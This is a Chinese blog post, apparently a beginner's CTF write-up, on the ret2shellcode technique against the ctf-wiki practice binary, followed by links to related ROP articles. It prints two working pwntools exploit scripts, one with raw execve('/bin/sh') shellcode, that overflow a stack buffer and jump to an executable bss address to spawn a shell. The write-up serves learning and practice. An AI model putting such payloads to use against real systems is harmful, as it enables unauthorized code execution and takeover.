基本ROP(二)

最新推荐文章于 2024-12-10 23:45:25 发布
原创 最新推荐文章于 2024-12-10 23:45:25 发布 · 1.6k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种利用ret2shellcode技术绕过二进制保护机制的方法。通过实际案例展示了如何利用程序的bss段权限,将shellcode置于栈上并控制程序执行,最终获取目标系统的shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

每日一结【第2天】

这年头果然不能随便立flag,随便有点啥事都能给耽误了,今天继续

二进制保护机制:http://www.mamicode.com/info-detail-1990426.html

ret2shellcode

原理:
ret2shellcode需要我们控制程序执行shellcode代码。而所谓的shellcode指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的shell。一般来说,shellcode都需要我们自己去填充。这其实是另外一种典型的利用的方法,即此时我们需要自己去填充一些可执行的代码。而在栈溢出的基础上,我们一般都是向栈中写内容,所以要想执行shellcode,需要对应的binary文件没有开启NX保护。

样例:ret2shellcode

第一步,先运行一下程序,顺道查看一下保护机制(偷个懒,不放那么多图了)
我们可以看到这个程序也是让输入一串字符,是32位程序,而且没有开启任何保护
这里写图片描述

然后扔进IDA里看一下,和上一题一样,存在栈溢出漏洞,我们双击buf2就会来到bss段,地址是0x0804A080(关于bss段戳这里
这里写图片描述

这里写图片描述

OK,现在大概已经了解一些了,使用上一次的方法调试一波,然后可得知输入的第一个字节距离ebp108个字节,距离ret地址112个字节
这里写图片描述

这个时候本次的重点来啦!!!

我们使用vmmap指令查看一下程序的内存,非(yi)常(liao)意(zhi)外(zhong)的发现,这个程序的bss段具有rwx权限,这就很令人开心啦,我们这次可以使用和上次不一样的方法
这里写图片描述
这一次,因为程序的bss段的权限足够,所以我们可以把shellcode直接布置到栈上,然后控制程序去执行

exp:

from pwn import *

r = process('./ret2shellcode')
shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
shellcode += "\x0b\xcd\x80"
buf2_addr = 0x804a080

r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()

执行结果:
这里写图片描述

这里还有一份exp,不过不知道为啥我这边执行总是出错,大家有兴趣可以看一下
exp:

from pwn import *

r = process('./ret2shellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804a080

r.sendline(shellcode.ljust(112, 'A') + p32(buf2_addr))
r.interactive()
pwn小白入门04---ret2shellcode
weixin_45943522的博客
02-21 2115
原理 ret2shellcode,当程序当中没有system函数时,我们需要自己往栈上写入一段shellcode,然后控制eip使其指向shellcode的地址。 shellcode 指的是用于完成某个功能的汇编代码,常见的功能主要是获取目标系统的 shell。 在栈溢出的基础上,要想执行 shellcode,需要对应的程序在运行时,shellcode 所在的区域具有可执行权限。即必须关闭堆栈不可执行功能。 例题(来自ctfwiki): 首先checksec: 发现程序没有开启任何保护,并且存在可读可写
pwn学习任务(
weixin_44319142的博客
12-31 1525
PWN学习任务() Python字符串处理 zio库用法 pwntools库用法 学习使用socat开端口运行程序 掌握ida远程调试方法 pwn题目远程调试的运行 Python字符串处理 撤销:Ctrl/Command + Z 重做:Ctrl/Command + Y 加粗:Ctrl/Command + B 斜体:Ctrl/Command + I 标题:Ctrl/Command + Shif...
PWN基础之构造ROP链(基本ROP
weixin_46132162的博客
02-02 7039
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
PWN ROP 技术全解析:原理、步骤与代码实例
最新发布
m0_57836225的博客
12-10 1022
在 PWN 领域中,ROP(Return - Oriented Programming)是一种强大的技术手段,它允许攻击者利用程序中已有的代码片段(gadgets)来构建恶意的执行流程,从而实现对目标系统的控制。本文将详细介绍 ROP 的概念、原理、实现步骤,并通过实际代码示例加深理解。
【PWN · ret2syscall | GoPwn】[2024CISCN · 华中赛区]go_note
Mr_Fmnwon的博客
07-02 1073
可以说是做的第一道GoPwn。。。进度确实太慢;此外,除了学习了对GoPwn的调试、逆向,也关注了Gadget利用的一些trick,ret2syscall也又一次进阶式地复习,收获良多。本题受益良多,开心。
基本ROP
m0_49959202的博客
08-14 1040
文章目录基本ROP1.原理1.1 概念原理1.2 分类1.2.1 ret2text1.2.2 ret2shellcode1.2.3 ret2syscall2.例题2.1 ret2text2.1.1 习题信息2.1.2 程序分析2.1.3 漏洞定位2.1.4 漏洞利用2.1.4.1 方法一:gdb手工计算2.1.4.2 方法:cyclic工具测算2.1.4.3 方法三:ida直接查看(不一定正确)2.1.5 exp编写2.2 retshellcode2.2.1 习题信息2.2.2 程序分析2.2.3 漏洞定
基本ROP技巧总结
极目楚天舒的博客
05-06 5852
ROP攻击前提:存在栈溢出并且可以控制返回地址存在满足条件的gadget,如果开启了PIE保护则要想办法泄露gadget的地址ret2text程序本身存在类似于system('/bin/sh')或者execv('/bin/sh')的片段,我们可以直接将返回地址覆盖为其地址跳转到已有代码上。例子:TODOret2shellcode这种方法要求我们自己构造shellcode并控制程序跳转到我们构造的s...
rop开放平台
04-12
1. **漏洞分析**:用户可以上传目标进制文件,平台会分析其是否存在适合构造ROP链的gadgets。 2. **ROP链生成器**:用户可以输入想要执行的命令或函数调用,平台会自动寻找合适的gadgets并构建完整的ROP链。 3. ...
ROP基本原理和实战教学,看这一篇就够了
QL_2023的博客
02-21 3320
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
ROP和Ret2libc漏洞
qq_67812668的博客
08-12 1131
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
ret2syscall(pwn第课)
s5555555___的博客
02-20 1906
xo.01 ret2syscall原理ret2syscall,即通过ROP控制程序执行系统调用,获取 shell。xo.02 ROP原理:随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是所谓 gadgets 就是以 ret 结尾的指令序列。例如:pop eax;ret这段代码的作用就是将。
ret2text,ret2syscall,ret2shellcode
2402_88122852的博客
11-15 646
ret2shellcode: 目标是将一段用于获取系统控制权的机器语言代码 (shellcode) 放置在内存的某个位置 (通常是栈上),然后修改程序的返回地址,使程序返回到 shellcode 并执行,从而获取系统控制权,通常是开启一个可以执行任意命令的 shell。ROPgadget--binary文件--only'pop|ret'|grep''ROPgadget--binary文件--string'bin/sh'ROPgadget--binary文件--only'int'
ShellCode自定位的几种实现方法
meanong的博客
05-28 2369
在编写shellcode的时候,经常需要定位当前程序的运行位置,所以在shellcode中定位运行的位置是一种常用的场景,本文记录了几种用于定位代码运行位置的方法。 [toc] 1.CALL/POP型 01 E8 00000000 call 06 将eip压栈,然后跳转到eip执行 06 58 pop eax 将eip出...
什么是ROP系统攻击
WH的博客
12-17 3853
文章目录ROP系统攻击初步了解寄存器内存管理常见汇编指令再究ROP攻击 ROP系统攻击初步了解 ROP全称为Return-oriented Programming(面向返回的编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构成恶意代码。 ROP的核心思想 (1)攻击者扫描已有的动态链接库和可执行文件,提取出可以利用的指令片段(gadget),这些指令片段均以ret指令结尾,即用ret指令实现指令片段执行流的衔接。 (2)操作系统通过栈来进行函数的调用和返回。函数
pwn学习-基本ROP
WocW的博客
03-03 2054
CTF-WIKI-pwn-基本ROP 漏洞复现 ret2text 首先检查程序的保护机制。 关于各个保护机制的介绍 :https://www.cnblogs.com/Spider-spiders/p/8798628.html 看到只开启了NX保护,即不可在栈上执行代码。 使用IDA查看源码,可以看到这里有一个危险的gets函数 以及这里有一个system函数 所以如...
rop学习(三)
陈安志的博客
01-12 1477
上一节讲解了rop如何进行参数的传递,以及返回。本章节讲解rop如何进行应用的授权访问以及验证  当用户需要访问某个应用系统前,应用系统一般都需要对该用户进行身份认证。常见的身份认证方法是让用户输入“用户/密码” ,当通过验证后,允许进入系统,否则阻止用户登录系统和应用系统类似,服务开放平台也需要对接入的应用进行身份认证,以确保服务只向合法授权的客户端应用开放。一般的做法是:服务开放平台通过一个
Ret2Syscall绕过NX、ASLR保护
X丶 的博客
11-20 1587
Ret2Syscall,即控制程序执行系统调用,进而获取shell。 下面看看我们的vuln程序。 可以看出,程序中的gets有明显的 溢出漏洞 用gdb打开, 检查一下文件开启了哪些防护: 可以看出程序开启了 NX(栈不可执行)防护,那么,我们可以用ROP绕过防护 接来下,我们利用溢出漏洞来控制程序执行syscall(系统调用) 有关syscall系统调用的信息,可以在...
Linux Kernel Exploit 内核漏洞学习(2)-ROP
热门推荐
钞sir的博客
08-05 1万+
简介 ROP的全称为Return-oriented Programming,主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程;这种攻击方法在用户态的条件中运用的比较多,ret2shellcode,ret2libc,ret2text等ret2系列都利用到了ROP的思想,当然这种攻击手法在内核态同样是有用的,并且手法都基...
ret2shellcode知识点及例题
weixin_44864859的博客
05-19 934
ret2shellcode 检查程序的基础信息后发现和ret2text不同的是其关闭了nx防护,这就代表IP寄存器可以指向堆,栈了。 运行程序可以看到只有一个输入,接下来用ida打开进行分析。 与ret2text一样可以很明显的看到在main函数中调用了gets函数。我们同样可以控制返回地址,但返回到什么地方呢? 查看内部函数可以看到,此时程序中并没有用到system函数,那应该怎么办呢? 这里需要注意有两个点 1 NX: NX disabled 2 strncpy(buf2, &a
Ropper工具:分析进制文件与构建跨架构ROP
资源摘要信息:"Ropper是一个功能强大的Python工具,用于分析进制文件和帮助在各种体系结构...以上所述知识点涵盖了Ropper工具的基本功能、支持的技术以及使用方法,为进制分析和安全研究提供了有力的工具支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值